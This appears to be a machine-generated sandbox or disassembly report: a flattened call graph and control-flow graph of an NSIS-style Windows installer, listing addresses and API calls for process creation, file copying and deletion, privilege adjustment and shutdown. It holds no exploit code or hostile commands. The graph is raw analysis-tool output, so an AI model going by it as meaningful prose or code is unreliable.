2437 405047 2430->2437 2431->2419 2438 40518e 2432->2438 2434->2424 2435->2433 2444 405479 ShowWindow 2435->2444 2436->2433 2437->2424 2442 405053 GetDlgItem 2437->2442 2438->2420 2443 405192 SendMessageW 2438->2443 2440 401533 90 API calls 2456 4051c7 2440->2456 2441 405448 DestroyWindow EndDialog 2441->2435 2445 405092 2442->2445 2446 40506f SendMessageW IsWindowEnabled 2442->2446 2443->2433 2444->2433 2449 4050a1 2445->2449 2450 4050b3 2445->2450 2451 4050e4 SendMessageW 2445->2451 2460 405099 2445->2460 2446->2433 2448 40508e 2446->2448 2448->2445 2449->2451 2449->2460 2454 4050ca 2450->2454 2455 4050bc 2450->2455 2451->2424 2452 4054f8 18 API calls 2452->2456 2459 401533 90 API calls 2454->2459 2517 401533 2455->2517 2456->2433 2456->2440 2456->2441 2456->2452 2475 405388 DestroyWindow 2456->2475 2487 405e98 2456->2487 2504 4054f8 2456->2504 2457 4050e2 2457->2424 2461 4050d1 2459->2461 2520 405936 2460->2520 2461->2424 2461->2460 2463 40524b GetDlgItem 2464 405272 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 2463->2464 2468 405266 2463->2468 2464->2468 2465 4052c7 GetSystemMenu EnableMenuItem SendMessageW 2466 4052f4 SendMessageW 2465->2466 2465->2468 2466->2468 2468->2464 2468->2465 2507 4054e1 SendMessageW 2468->2507 2508 405cf9 2468->2508 2511 406af8 lstrcpynW 2468->2511 2471 405326 lstrlenW 2472 405e98 17 API calls 2471->2472 2473 405340 SetWindowTextW 2472->2473 2512 401399 2473->2512 2475->2435 2476 4053a2 CreateDialogParamW 2475->2476 2476->2435 2477 4053d5 2476->2477 2478 4054f8 18 API calls 2477->2478 2479 4053e0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2478->2479 2480 401399 90 API calls 2479->2480 2481 405426 2480->2481 2481->2433 2482 40542e ShowWindow 2481->2482 2483 4054c6 SendMessageW 2482->2483 2483->2435 2485 4054de 2484->2485 2486 4054cf SendMessageW 2484->2486 2485->2456 2486->2485 2494 405ea3 2487->2494 2488 4060dc 2489 4060f1 2488->2489 2544 406af8 lstrcpynW 2488->2544 2489->2456 2492 4060a7 lstrlenW 2492->2494 2493 405fbc GetSystemDirectoryW 2493->2494 2494->2488 2494->2492 2494->2493 2495 405e98 10 API calls 2494->2495 2496 405fcf GetWindowsDirectoryW 2494->2496 2499 405ffc SHGetSpecialFolderLocation 2494->2499 2500 405e98 10 API calls 2494->2500 2502 406048 lstrcatW 2494->2502 2503 406d1b CharNextW CharNextW CharNextW CharNextW CharPrevW 2494->2503 2537 406955 2494->2537 2542 4065fd wsprintfW 2494->2542 2543 406af8 lstrcpynW 2494->2543 2495->2492 2496->2494 2499->2494 2501 406014 SHGetPathFromIDListW CoTaskMemFree 2499->2501 2500->2494 2501->2494 2502->2494 2503->2494 2505 405e98 17 API calls 2504->2505 2506 405503 SetDlgItemTextW 2505->2506 2506->2463 2507->2468 2509 405e98 17 API calls 2508->2509 2510 405d07 SetWindowTextW 2509->2510 2510->2468 2511->2471 2513 401413 2512->2513 2515 4013a3 2512->2515 2513->2456 2515->2513 2516 4013df MulDiv SendMessageW 2515->2516 2549 40154a 2515->2549 2516->2515 2518 401399 90 API calls 2517->2518 2519 401547 2518->2519 2519->2460 2521 405943 SendMessageW 2520->2521 2522 40593d 2520->2522 2521->2457 2522->2521 2524 405751 GetWindowLongW 2523->2524 2534 405807 2523->2534 2525 405766 2524->2525 2524->2534 2526 40579a 2525->2526 2527 40578e GetSysColor 2525->2527 2525->2534 2528 4057a8 SetBkMode 2526->2528 2529 40579e SetTextColor 2526->2529 2527->2526 2530 4057d0 2528->2530 2531 4057c1 GetSysColor 2528->2531 2529->2528 2532 4057d4 SetBkColor 2530->2532 2533 4057e1 2530->2533 2531->2530 2532->2533 2533->2534 2535 4057f1 DeleteObject 2533->2535 2536 4057fa CreateBrushIndirect 2533->2536 2534->2433 2535->2536 2536->2534 2545 4062b6 2537->2545 2540 4069bb 2540->2494 2541 40698a RegQueryValueExW RegCloseKey 2541->2540 2542->2494 2543->2494 2544->2489 2546 4062c5 2545->2546 2547 4062ce RegOpenKeyExW 2546->2547 2548 4062c9 2546->2548 2547->2548 2548->2540 2548->2541 2550 4015c3 2549->2550 2658 4015ce 2549->2658 2551 4016c1 2550->2551 2552 4017c2 2550->2552 2553 4015e6 2550->2553 2554 4018cb 2550->2554 2555 40160c 2550->2555 2556 4016ef 2550->2556 2557 4016af 2550->2557 2558 40182f 2550->2558 2559 401711 2550->2559 2560 401633 SetForegroundWindow 2550->2560 2561 4017d3 2550->2561 2562 401618 2550->2562 2563 4015f9 2550->2563 2564 40189b 2550->2564 2565 4018de 2550->2565 2566 40163f 2550->2566 2550->2658 2659 4015d5 2550->2659 2568 4016d1 ShowWindow 2551->2568 2569 4016d9 2551->2569 2572 40303e 17 API calls 2552->2572 2571 4015f0 PostQuitMessage 2553->2571 2553->2658 2576 40303e 17 API calls 2554->2576 2587 405d18 24 API calls 2555->2587 2663 40303e 2556->2663 2732 4065fd wsprintfW 2557->2732 2579 40303e 17 API calls 2558->2579 2573 40303e 17 API calls 2559->2573 2560->2658 2575 40303e 17 API calls 2561->2575 2660 403002 2562->2660 2595 401399 73 API calls 2563->2595 2574 40303e 17 API calls 2564->2574 2578 40303e 17 API calls 2565->2578 2599 403002 17 API calls 2566->2599 2566->2658 2568->2569 2581 4016e6 ShowWindow 2569->2581 2569->2658 2571->2658 2584 4017c8 2572->2584 2585 401718 2573->2585 2586 4018a2 SearchPathW 2574->2586 2588 4017da 2575->2588 2589 4018d2 2576->2589 2591 4018e5 2578->2591 2580 401835 GetFullPathNameW 2579->2580 2592 401857 2580->2592 2593 40184d 2580->2593 2581->2658 2582 405d18 24 API calls 2582->2658 2736 4065ad FindFirstFileW 2584->2736 2668 406ba3 CharNextW CharNextW 2585->2668 2586->2658 2587->2658 2597 40303e 17 API calls 2588->2597 2698 406a34 2589->2698 2590 40161e Sleep 2590->2658 2604 401906 2591->2604 2605 40190e 2591->2605 2592->2593 2607 4065ad 2 API calls 2592->2607 2601 401889 GetShortPathNameW 2593->2601 2593->2658 2595->2658 2600 4017e3 2597->2600 2599->2658 2603 40303e 17 API calls 2600->2603 2601->2658 2602 401780 2602->2555 2606 401790 2602->2606 2609 4017ec MoveFileW 2603->2609 2744 406af8 lstrcpynW 2604->2744 2745 406af8 lstrcpynW 2605->2745 2686 405d18 2606->2686 2613 40186a 2607->2613 2609->2555 2614 401804 2609->2614 2613->2593 2743 406af8 lstrcpynW 2613->2743 2623 4065ad 2 API calls 2614->2623 2614->2658 2615 40190c 2702 406d1b 2615->2702 2616 401919 2746 406534 lstrlenW CharPrevW 2616->2746 2627 401814 2623->2627 2625 4017a2 SetCurrentDirectoryW 2625->2658 2627->2658 2739 40621b MoveFileExW 2627->2739 2628 401720 2628->2602 2630 401769 GetFileAttributesW 2628->2630 2674 4065d4 2628->2674 2678 4064da 2628->2678 2681 405e1c CreateDirectoryW 2628->2681 2733 405dfc CreateDirectoryW 2628->2733 2630->2628 2631 4065ad 2 API calls 2653 40192b 2631->2653 2632 401968 2749 406b7b GetFileAttributesW 2632->2749 2636 40193f CompareFileTime 2636->2653 2637 401a18 2638 405d18 24 API calls 2637->2638 2641 401a24 2638->2641 2639 4019fd 2640 405d18 24 API calls 2639->2640 2640->2658 2712 403148 2641->2712 2642 406af8 lstrcpynW 2642->2653 2645 401a52 SetFileTime 2646 401a60 CloseHandle 2645->2646 2648 401a73 2646->2648 2646->2658 2647 405e98 17 API calls 2647->2653 2649 401a78 2648->2649 2650 401a89 2648->2650 2651 405e98 17 API calls 2649->2651 2652 405e98 17 API calls 2650->2652 2654 401a80 lstrcatW 2651->2654 2655 401a91 2652->2655 2653->2631 2653->2632 2653->2636 2653->2637 2653->2639 2653->2642 2653->2647 2653->2659 2711 4068f9 GetFileAttributesW CreateFileW 2653->2711 2752 406a86 2653->2752 2654->2655 2657 406a86 MessageBoxIndirectW 2655->2657 2657->2658 2658->2515 2659->2582 2659->2658 2661 405e98 17 API calls 2660->2661 2662 403016 2661->2662 2662->2590 2664 405e98 17 API calls 2663->2664 2665 403067 2664->2665 2666 4016f6 SetFileAttributesW 2665->2666 2667 406d1b 5 API calls 2665->2667 2666->2658 2667->2666 2669 406bc1 2668->2669 2673 406bf8 2668->2673 2670 406bd0 CharNextW 2669->2670 2671 406bd5 2669->2671 2670->2673 2672 4065d4 CharNextW 2671->2672 2671->2673 2672->2671 2673->2628 2675 4065e0 2674->2675 2676 4065fa 2674->2676 2675->2676 2677 4065e9 CharNextW 2675->2677 2676->2628 2677->2675 2677->2676 2756 4068c4 GetModuleHandleA 2678->2756 2682 405e67 GetLastError 2681->2682 2683 405e8a 2681->2683 2682->2683 2684 405e74 SetFileSecurityW 2682->2684 2683->2628 2684->2683 2685 405e8e GetLastError 2684->2685 2685->2683 2687 405d2a 2686->2687 2696 401797 2686->2696 2688 405d49 lstrlenW 2687->2688 2689 405e98 17 API calls 2687->2689 2690 405d5b lstrlenW 2688->2690 2691 405d7e 2688->2691 2689->2688 2692 405d70 lstrcatW 2690->2692 2690->2696 2693 405d95 2691->2693 2694 405d88 SetWindowTextW 2691->2694 2692->2691 2695 405d9a SendMessageW SendMessageW SendMessageW 2693->2695 2693->2696 2694->2693 2695->2696 2697 406af8 lstrcpynW 2696->2697 2697->2625 2699 406a41 GetTickCount GetTempFileNameW 2698->2699 2700 406a75 2699->2700 2701 406a79 2699->2701 2700->2699 2700->2701 2701->2658 2703 406d30 2702->2703 2704 406db2 2703->2704 2706 406da3 CharNextW 2703->2706 2707 4065d4 CharNextW 2703->2707 2709 406d8f CharNextW 2703->2709 2710 406d9e CharNextW 2703->2710 2705 406dba CharPrevW 2704->2705 2708 406dda 2704->2708 2705->2704 2706->2703 2706->2704 2707->2703 2708->2653 2709->2703 2710->2706 2711->2653 2713 403190 2712->2713 2714 403183 2712->2714 2765 406926 ReadFile 2713->2765 2772 403131 SetFilePointer 2714->2772 2718 401a3a 2718->2645 2718->2646 2719 4031b6 GetTickCount 2719->2718 2727 4031e6 2719->2727 2720 4032f9 2721 403340 2720->2721 2725 4032fd 2720->2725 2723 40311b ReadFile 2721->2723 2723->2718 2724 40311b ReadFile 2724->2725 2725->2718 2725->2724 2726 4069e9 WriteFile 2725->2726 2726->2725 2727->2718 2728 40323d GetTickCount 2727->2728 2729 40326e MulDiv wsprintfW 2727->2729 2767 40311b 2727->2767 2770 4069e9 WriteFile 2727->2770 2728->2727 2730 405d18 24 API calls 2729->2730 2730->2727 2732->2658 2734 405e16 2733->2734 2735 405e0e GetLastError 2733->2735 2734->2628 2735->2734 2737 4065c3 FindClose 2736->2737 2738 4065ce 2736->2738 2737->2738 2738->2658 2740 40623c 2739->2740 2741 40622f 2739->2741 2740->2555 2773 4062e4 2741->2773 2743->2593 2744->2615 2745->2616 2747 406551 lstrcatW 2746->2747 2748 40191f lstrcatW 2746->2748 2747->2748 2748->2615 2750 406b9d 2749->2750 2751 406b8d SetFileAttributesW 2749->2751 2750->2653 2751->2750 2755 406a9b 2752->2755 2753 406ae9 2753->2653 2754 406ab1 MessageBoxIndirectW 2754->2753 2755->2753 2755->2754 2757 4068e6 GetProcAddress 2756->2757 2758 4068dc 2756->2758 2759 4064e1 2757->2759 2762 40617c GetSystemDirectoryW 2758->2762 2759->2628 2761 4068e2 2761->2757 2761->2759 2763 40619e wsprintfW LoadLibraryExW 2762->2763 2763->2761 2766 4031a2 2765->2766 2766->2718 2766->2719 2766->2720 2768 406926 ReadFile 2767->2768 2769 40312e 2768->2769 2769->2727 2771 406a0a 2770->2771 2771->2727 2772->2713 2774 406314 2773->2774 2775 40633a GetShortPathNameW 2773->2775 2800 4068f9 GetFileAttributesW CreateFileW 2774->2800 2776 40641a 2775->2776 2777 40634f 2775->2777 2776->2740 2777->2776 2779 406357 wsprintfA 2777->2779 2781 405e98 17 API calls 2779->2781 2780 40631e CloseHandle GetShortPathNameW 2780->2776 2782 406332 2780->2782 2783 406380 2781->2783 2782->2775 2782->2776 2801 4068f9 GetFileAttributesW CreateFileW 2783->2801 2785 40638d 2785->2776 2786 406398 GetFileSize GlobalAlloc 2785->2786 2787 406413 CloseHandle 2786->2787 2788 4063b7 2786->2788 2787->2776 2789 406926 ReadFile 2788->2789 2790 4063bf 2789->2790 2790->2787 2802 406b14 lstrlenA lstrlenA 2790->2802 2793 4063d2 lstrcpyA 2797 4063e4 2793->2797 2794 40641f 2795 406b14 3 API calls 2794->2795 2795->2797 2796 4063f5 SetFilePointer 2798 4069e9 WriteFile 2796->2798 2797->2796 2799 40640c GlobalFree 2798->2799 2799->2787 2800->2780 2801->2785 2803 4063ce 2802->2803 2804 406b33 2802->2804 2803->2793 2803->2794 2804->2803 2805 406b60 lstrlenA 2804->2805 2805->2803 2805->2804 2964 6ff81a4a 2965 6ff81a5a VirtualProtect 2964->2965 2966 6ff81aa1 2964->2966 2965->2966 3299 6ff82c6a 3300 6ff82cc3 3299->3300 3301 6ff82cd8 3300->3301 3302 6ff82ccd GetLastError 3300->3302 3302->3301 3303 6ff81b0a 3304 6ff81b38 3303->3304 3305 6ff82351 21 API calls 3304->3305 3306 6ff81b3f 3305->3306 3307 6ff81b52 3306->3307 3308 6ff81b46 3306->3308 3310 6ff81b5c 3307->3310 3311 6ff81b73 3307->3311 3309 6ff815eb 2 API calls 3308->3309 3314 6ff81b50 3309->3314 3315 6ff815c5 2 API calls 3310->3315 3312 6ff81b79 3311->3312 3313 6ff81b9f 3311->3313 3317 6ff81668 2 API calls 3312->3317 3318 6ff815c5 2 API calls 3313->3318 3316 6ff81b61 3315->3316 3319 6ff81668 2 API calls 3316->3319 3320 6ff81b7e 3317->3320 3318->3314 3321 6ff81b67 3319->3321 3322 6ff815eb 2 API calls 3320->3322 3323 6ff815eb 2 API calls 3321->3323 3324 6ff81b84 GlobalFree 3322->3324 3325 6ff81b6d GlobalFree 3323->3325 3324->3314 3324->3325 3331 6ff81000 3334 6ff8101b 3331->3334 3335 6ff8156c GlobalFree 3334->3335 3336 6ff81020 3335->3336 3337 6ff81032 3336->3337 3338 6ff81024 GlobalAlloc 3336->3338 3339 6ff815c5 2 API calls 3337->3339 3338->3337 3340 6ff81019 3339->3340 2967 4036da SetErrorMode GetVersionExW 2968 403725 GetVersionExW 2967->2968 2970 40375c 2967->2970 2969 403747 2968->2969 2969->2970 2971 4037c3 2970->2971 2972 4068c4 5 API calls 2970->2972 2973 40617c 3 API calls 2971->2973 2972->2971 2974 4037d9 lstrlenA 2973->2974 2974->2971 2975 4037e7 2974->2975 2976 4068c4 5 API calls 2975->2976 2977 4037ee 2976->2977 2978 4068c4 5 API calls 2977->2978 2979 4037f5 2978->2979 2980 4068c4 5 API calls 2979->2980 2981 403801 #17 OleInitialize SHGetFileInfoW 2980->2981 3057 406af8 lstrcpynW 2981->3057 2984 40384f GetCommandLineW 3058 406af8 lstrcpynW 2984->3058 2986 403860 2987 4065d4 CharNextW 2986->2987 2988 40389a CharNextW 2987->2988 2989 403988 GetTempPathW 2988->2989 2992 4038b3 2988->2992 3059 403c83 2989->3059 2991 4039a0 2993 4039a4 GetWindowsDirectoryW lstrcatW 2991->2993 2994 4039fa DeleteFileW 2991->2994 2992->2989 2997 4065d4 CharNextW 2992->2997 3007 403974 2992->3007 2996 403c83 12 API calls 2993->2996 3069 4033cb GetTickCount GetModuleFileNameW 2994->3069 2999 4039c0 2996->2999 2997->2992 2998 403a0d 3000 403a90 2998->3000 3002 403a82 2998->3002 3004 4065d4 CharNextW 2998->3004 2999->2994 3001 4039c4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2999->3001 3176 4036b0 3000->3176 3003 403c83 12 API calls 3001->3003 3097 405a1c 3002->3097 3008 4039f2 3003->3008 3018 403a2c 3004->3018 3158 406af8 lstrcpynW 3007->3158 3008->2994 3008->3000 3011 403bd7 3015 406a86 MessageBoxIndirectW 3011->3015 3012 403bea 3013 403bf3 GetCurrentProcess OpenProcessToken 3012->3013 3014 403be2 ExitProcess 3012->3014 3016 403c0b LookupPrivilegeValueW AdjustTokenPrivileges 3013->3016 3017 403c3f 3013->3017 3015->3014 3016->3017 3022 4068c4 5 API calls 3017->3022 3019 403a56 3018->3019 3020 403a97 3018->3020 3159 406616 3019->3159 3023 4064da 5 API calls 3020->3023 3025 403c46 3022->3025 3026 403a9c lstrcatW 3023->3026 3028 403c5b ExitWindowsEx 3025->3028 3032 403c68 3025->3032 3029 403ac0 lstrcatW lstrcmpiW 3026->3029 3030 403ab1 lstrcatW 3026->3030 3028->3014 3028->3032 3029->3000 3033 403ae7 3029->3033 3030->3029 3035 401533 90 API calls 3032->3035 3036 403af0 3033->3036 3037 403af7 3033->3037 3034 403a77 3174 406af8 lstrcpynW 3034->3174 3035->3014 3040 405e1c 4 API calls 3036->3040 3038 405dfc 2 API calls 3037->3038 3041 403afc SetCurrentDirectoryW 3038->3041 3042 403af5 3040->3042 3043 403b10 3041->3043 3044 403b1f 3041->3044 3042->3041 3175 406af8 lstrcpynW 3043->3175 3154 406af8 lstrcpynW 3044->3154 3047 405e98 17 API calls 3048 403b4f DeleteFileW 3047->3048 3049 403b5a CopyFileW 3048->3049 3054 403b2d 3048->3054 3049->3054 3050 403bb3 3051 40621b 35 API calls 3050->3051 3051->3000 3052 40621b 35 API calls 3052->3054 3053 405e98 17 API calls 3053->3054 3054->3047 3054->3050 3054->3052 3054->3053 3056 403b9e CloseHandle 3054->3056 3155 4066b4 CreateProcessW 3054->3155 3056->3054 3057->2984 3058->2986 3060 406d1b 5 API calls 3059->3060 3061 403c8f 3060->3061 3062 403c99 3061->3062 3063 406534 3 API calls 3061->3063 3062->2991 3064 403ca1 3063->3064 3065 405dfc 2 API calls 3064->3065 3066 403ca7 3065->3066 3067 406a34 2 API calls 3066->3067 3068 403cb2 3067->3068 3068->2991 3183 4068f9 GetFileAttributesW CreateFileW 3069->3183 3071 40340d 3088 40341a 3071->3088 3184 406af8 lstrcpynW 3071->3184 3073 403430 3185 406cee lstrlenW 3073->3185 3077 403441 GetFileSize 3078 40345a 3077->3078 3094 403548 3077->3094 3080 40311b ReadFile 3078->3080 3082 403616 3078->3082 3078->3088 3091 403367 6 API calls 3078->3091 3078->3094 3080->3078 3081 403557 3083 403598 GlobalAlloc 3081->3083 3081->3088 3201 403131 SetFilePointer 3081->3201 3085 403367 6 API calls 3082->3085 3202 403131 SetFilePointer 3083->3202 3085->3088 3087 403574 3090 406926 ReadFile 3087->3090 3088->2998 3089 4035b5 3092 403148 31 API calls 3089->3092 3093 403586 3090->3093 3091->3078 3095 4035c4 3092->3095 3093->3083 3093->3088 3190 403367 3094->3190 3095->3088 3095->3095 3096 4035f4 SetFilePointer 3095->3096 3096->3088 3098 4068c4 5 API calls 3097->3098 3099 405a30 3098->3099 3100 405a39 3099->3100 3101 405a4b 3099->3101 3222 4065fd wsprintfW 3100->3222 3102 406955 3 API calls 3101->3102 3103 405a7a 3102->3103 3104 405a99 lstrcatW 3103->3104 3106 406955 3 API calls 3103->3106 3107 405a49 3104->3107 3106->3104 3207 40595d 3107->3207 3110 406616 18 API calls 3111 405acb 3110->3111 3112 405b65 3111->3112 3114 406955 3 API calls 3111->3114 3113 406616 18 API calls 3112->3113 3115 405b6b 3113->3115 3116 405afe 3114->3116 3117 405b7b LoadImageW 3115->3117 3120 405e98 17 API calls 3115->3120 3116->3112 3123 405b22 lstrlenW 3116->3123 3127 4065d4 CharNextW 3116->3127 3118 405c28 3117->3118 3119 405bab RegisterClassW 3117->3119 3122 401533 90 API calls 3118->3122 3121 405bdf SystemParametersInfoW CreateWindowExW 3119->3121 3153 405bd8 3119->3153 3120->3117 3121->3118 3126 405c2e 3122->3126 3124 405b32 lstrcmpiW 3123->3124 3125 405b58 3123->3125 3124->3125 3129 405b42 GetFileAttributesW 3124->3129 3130 406534 3 API calls 3125->3130 3132 40595d 18 API calls 3126->3132 3126->3153 3128 405b1d 3127->3128 3128->3123 3131 405b4e 3129->3131 3133 405b5e 3130->3133 3131->3125 3134 406cee 2 API calls 3131->3134 3135 405c3b 3132->3135 3223 406af8 lstrcpynW 3133->3223 3134->3125 3137 405c47 ShowWindow 3135->3137 3138 405cc9 3135->3138 3140 40617c 3 API calls 3137->3140 3215 405842 OleInitialize 3138->3215 3142 405c5f 3140->3142 3141 405ccf 3143 405cd3 3141->3143 3144 405ced 3141->3144 3145 405c6d GetClassInfoW 3142->3145 3148 40617c 3 API calls 3142->3148 3152 401533 90 API calls 3143->3152 3143->3153 3149 401533 90 API calls 3144->3149 3146 405c80 GetClassInfoW RegisterClassW 3145->3146 3147 405c96 DialogBoxParamW 3145->3147 3146->3147 3151 401533 90 API calls 3147->3151 3148->3145 3150 405cf4 3149->3150 3150->3150 3151->3153 3152->3153 3153->3000 3154->3054 3156 4066f3 3155->3156 3157 4066e7 CloseHandle 3155->3157 3156->3054 3157->3156 3158->2989 3225 406af8 lstrcpynW 3159->3225 3161 406627 3162 406ba3 4 API calls 3161->3162 3163 40662d 3162->3163 3164 403a64 3163->3164 3165 406d1b 5 API calls 3163->3165 3164->3000 3173 406af8 lstrcpynW 3164->3173 3171 406639 3165->3171 3166 406669 lstrlenW 3167 406675 3166->3167 3166->3171 3168 406534 3 API calls 3167->3168 3170 40667a GetFileAttributesW 3168->3170 3169 4065ad 2 API calls 3169->3171 3170->3164 3171->3164 3171->3166 3171->3169 3172 406cee 2 API calls 3171->3172 3172->3166 3173->3034 3174->3002 3175->3044 3177 4036c8 3176->3177 3178 4036ba CloseHandle 3176->3178 3226 403cf1 3177->3226 3178->3177 3183->3071 3184->3073 3186 406cfd 3185->3186 3187 406d03 CharPrevW 3186->3187 3188 403436 3186->3188 3187->3186 3187->3188 3189 406af8 lstrcpynW 3188->3189 3189->3077 3191 403386 3190->3191 3192 40336e 3190->3192 3195 403397 GetTickCount 3191->3195 3196 40338f 3191->3196 3193 403377 DestroyWindow 3192->3193 3194 40337e 3192->3194 3193->3194 3194->3081 3197 4033a5 CreateDialogParamW ShowWindow 3195->3197 3198 4033ca 3195->3198 3203 4061ed 3196->3203 3197->3198 3198->3081 3201->3087 3202->3089 3204 4061ff PeekMessageW 3203->3204 3205 4061f5 DispatchMessageW 3204->3205 3206 403396 3204->3206 3205->3204 3206->3081 3208 405970 3207->3208 3224 4065fd wsprintfW 3208->3224 3210 4059e9 3211 405cf9 18 API calls 3210->3211 3213 4059ee 3211->3213 3212 405a17 3212->3110 3213->3212 3214 405e98 17 API calls 3213->3214 3214->3213 3216 4054c6 SendMessageW 3215->3216 3219 405865 3216->3219 3217 40588c 3218 4054c6 SendMessageW 3217->3218 3220 40589e OleUninitialize 3218->3220 3219->3217 3221 401399 90 API calls 3219->3221 3220->3141 3221->3219 3222->3107 3223->3112 3224->3210 3225->3161 3227 403cff 3226->3227 3228 4036cd 3227->3228 3229 403d04 FreeLibrary GlobalFree 3227->3229 3230 4066f7 3228->3230 3229->3228 3229->3229 3231 406616 18 API calls 3230->3231 3232 406719 3231->3232 3233 406722 DeleteFileW 3232->3233 3234 406739 3232->3234 3235 4036d9 OleUninitialize 3233->3235 3234->3235 3237 406859 3234->3237 3269 406af8 lstrcpynW 3234->3269 3235->3011 3235->3012 3237->3235 3239 4065ad 2 API calls 3237->3239 3238 406761 3240 406779 3238->3240 3241 40676b lstrcatW 3238->3241 3242 406876 3239->3242 3244 406cee 2 API calls 3240->3244 3243 40677f 3241->3243 3242->3235 3246 40687a 3242->3246 3245 406790 lstrcatW 3243->3245 3247 406798 lstrlenW FindFirstFileW 3243->3247 3244->3243 3245->3247 3248 406534 3 API calls 3246->3248 3247->3237 3252 4067c1 3247->3252 3249 406880 3248->3249 3250 406563 5 API calls 3249->3250 3251 40688c 3250->3251 3254 406890 3251->3254 3255 4068af 3251->3255 3253 40683b FindNextFileW 3252->3253 3263 4066f7 59 API calls 3252->3263 3265 406807 3252->3265 3270 406af8 lstrcpynW 3252->3270 3253->3252 3258 406852 FindClose 3253->3258 3254->3235 3259 405d18 24 API calls 3254->3259 3257 405d18 24 API calls 3255->3257 3257->3235 3258->3237 3261 40689c 3259->3261 3262 40621b 35 API calls 3261->3262 3264 4068a5 3262->3264 3263->3265 3264->3235 3265->3253 3266 405d18 24 API calls 3265->3266 3267 405d18 24 API calls 3265->3267 3268 40621b 35 API calls 3265->3268 3271 406563 3265->3271 3266->3253 3267->3265 3268->3265 3269->3238 3270->3252 3272 406b7b 2 API calls 3271->3272 3273 40656f 3272->3273 3274 406591 3273->3274 3275 406587 DeleteFileW 3273->3275 3276 40657f RemoveDirectoryW 3273->3276 3274->3265 3277 40658d 3275->3277 3276->3277 3277->3274 3278 40659c SetFileAttributesW 3277->3278 3278->3274 3346 6ff812c6 3347 6ff8101b 4 API calls 3346->3347 3348 6ff812df 3347->3348 3349 6ff810c7 3356 6ff810f8 3349->3356 3350 6ff812be GlobalFree 3351 6ff81258 GlobalFree 3351->3356 3352 6ff811d7 GlobalAlloc 3352->3356 3353 6ff812ba 3353->3350 3354 6ff81548 3 API calls 3354->3356 3355 6ff81296 GlobalFree 3355->3356 3356->3350 3356->3351 3356->3352 3356->3353 3356->3354 3356->3355 3357 6ff815eb 2 API calls 3356->3357 3358 6ff81638 lstrcpyW 3356->3358 3360 6ff81165 GlobalAlloc 3356->3360 3359 6ff811ca GlobalFree 3357->3359 3361 6ff811ab GlobalFree 3358->3361 3359->3356 3360->3356 3361->3356 3362 6ff81cc7 3363 6ff81cee 3362->3363 3364 6ff81d4e __alldvrm 3363->3364 3365 6ff81d2f GlobalFree 3363->3365 3366 6ff815eb 2 API calls 3364->3366 3365->3364 3367 6ff81de5 GlobalFree GlobalFree 3366->3367 3368 6ff81aa7 3369 6ff8156c GlobalFree 3368->3369 3372 6ff81abf 3369->3372 3370 6ff81b01 GlobalFree 3371 6ff81add 3371->3370 3372->3370 3372->3371 3373 6ff81aed VirtualFree 3372->3373 3373->3370

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 4036da-403723 SetErrorMode GetVersionExW 1 403725-403745 GetVersionExW 0->1 2 40375c 0->2 3 403747-40374b 1->3 4 403758-40375a 1->4 5 403763-403768 2->5 8 40374e-403756 3->8 4->8 6 403775 5->6 7 40376a-403773 5->7 9 403779-4037bb 6->9 7->9 8->5 10 4037bd-4037c5 call 4068c4 9->10 11 4037ce 9->11 10->11 16 4037c7 10->16 13 4037d3-4037e5 call 40617c lstrlenA 11->13 18 4037e7-403803 call 4068c4 * 3 13->18 16->11 25 403814-4038ad #17 OleInitialize SHGetFileInfoW call 406af8 GetCommandLineW call 406af8 call 4065d4 CharNextW 18->25 26 403805-40380b 18->26 35 4038b3 25->35 36 403988-4039a2 GetTempPathW call 403c83 25->36 26->25 30 40380d 26->30 30->25 38 4038b5-4038bb 35->38 44 4039a4-4039c2 GetWindowsDirectoryW lstrcatW call 403c83 36->44 45 4039fa-403a13 DeleteFileW call 4033cb 36->45 39 4038c8-4038d3 38->39 40 4038bd-4038c6 38->40 42 4038d5-4038dc 39->42 43 4038de-4038ed 39->43 40->39 40->40 42->43 47 403948-40395c call 4065d4 43->47 48 4038ef-4038fb 43->48 44->45 62 4039c4-4039f4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c83 44->62 56 403bc4 45->56 57 403a19-403a1f 45->57 63 403964-40396a 47->63 64 40395e-403961 47->64 52 403915-40391b 48->52 53 4038fd-403904 48->53 60 403937-40393e 52->60 61 40391d-403924 52->61 58 403906-403909 53->58 59 40390b 53->59 67 403bc8-403bd5 call 4036b0 OleUninitialize 56->67 65 403a21-403a33 call 4065d4 57->65 66 403a84-403a8b call 405a1c 57->66 58->52 58->59 59->52 60->47 69 403940-403946 60->69 61->60 68 403926-40392d 61->68 62->45 79 403bc2 62->79 63->36 71 40396c-40396f 63->71 64->63 84 403a49-403a4b 65->84 81 403a90-403a92 66->81 85 403bd7-403be2 call 406a86 67->85 86 403bea-403bf1 67->86 75 403934 68->75 76 40392f-403932 68->76 69->47 77 403974-403983 call 406af8 69->77 71->38 75->60 76->60 76->75 77->36 79->56 81->67 89 403a35-403a3b 84->89 90 403a4d-403a54 84->90 98 403be4 ExitProcess 85->98 87 403bf3-403c09 GetCurrentProcess OpenProcessToken 86->87 88 403c6f-403c7e 86->88 92 403c0b-403c39 LookupPrivilegeValueW AdjustTokenPrivileges 87->92 93 403c3f-403c4d call 4068c4 87->93 88->98 94 403a46 89->94 95 403a3d-403a44 89->95 96 403a56-403a66 call 406616 90->96 97 403a97-403aaf call 4064da lstrcatW 90->97 92->93 106 403c5b-403c66 ExitWindowsEx 93->106 107 403c4f-403c59 93->107 94->84 95->90 95->94 110 403a6c-403a82 call 406af8 * 2 96->110 111 403bbe-403bc0 96->111 108 403ac0-403ae1 lstrcatW lstrcmpiW 97->108 109 403ab1-403abb lstrcatW 97->109 106->88 113 403c68-403c6a call 401533 106->113 107->106 107->113 108->111 114 403ae7-403aee 108->114 109->108 110->66 111->67 113->88 118 403af0-403af5 call 405e1c 114->118 119 403af7 call 405dfc 114->119 123 403afc-403b0e SetCurrentDirectoryW 118->123 119->123 126 403b10-403b1a call 406af8 123->126 127 403b1f-403b39 call 406af8 123->127 126->127 131 403b3a-403b58 call 405e98 DeleteFileW 127->131 134 403ba7-403bb1 131->134 135 403b5a-403b6e CopyFileW 131->135 134->131 136 403bb3-403bb9 call 40621b 134->136 135->134 137 403b70-403b95 call 40621b call 405e98 call 4066b4 135->137 136->111 144 403b9a-403b9c 137->144 144->134 145 403b9e-403ba5 CloseHandle 144->145 145->134
